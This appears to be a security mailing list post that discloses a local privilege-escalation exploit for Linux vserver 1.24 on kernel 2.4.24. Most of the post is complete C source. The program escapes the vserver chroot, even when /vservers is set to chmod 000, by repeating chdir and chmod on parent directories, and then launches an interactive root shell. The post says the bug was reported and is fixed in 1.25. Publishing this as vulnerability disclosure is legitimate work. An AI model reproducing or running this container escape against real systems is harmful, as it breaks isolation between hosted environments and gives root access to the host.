Local exploit that breaks out of a vserver, even if it is secured with chmod 000 /vservers. Modified version of the chroot-again exploit. Tested with linux 2.4.24 and vserver 1.24. Fixed in release 1.25.
ecb32af70153e79f3accdcb8ad729fc7c190f6447576c9716239b96b27b6bad2
Hi securityfocus,
a small exploit from me which brakes out of a vserver, also if secured
with "chmod 000 /vservers". It is a modification of the known
"chroot-again" exploit. It belongs to chroots but also to the vserver
project. Tested with linux 2.4.24 and vserver 1.24. The bug was posted
to the developers, and in the today released version 1.25 it seems to be
fixed.
/* vserver@deadbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */
/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */
#include <sys/types.h>
#include <sys/stat.h>
main()
{
int i;
if (chdir("/") != 0) {
perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
perror("mkdir baz");
}
if (chroot("baz") != 0) {
perror("chroot baz"); exit(1);
}
for (i=0; i<50; i++) {
if (chdir("..") != 0) {
perror("cd .."); /* exit(1); */
}
if (chmod("..", S_IXOTH) != 0) {
perror("chmod"); /* exit(1); */
}
}
if (chroot(".") != 0) {
perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}
The developers have been noticed.
Greetings,
Markus Müller
GeNUA mbH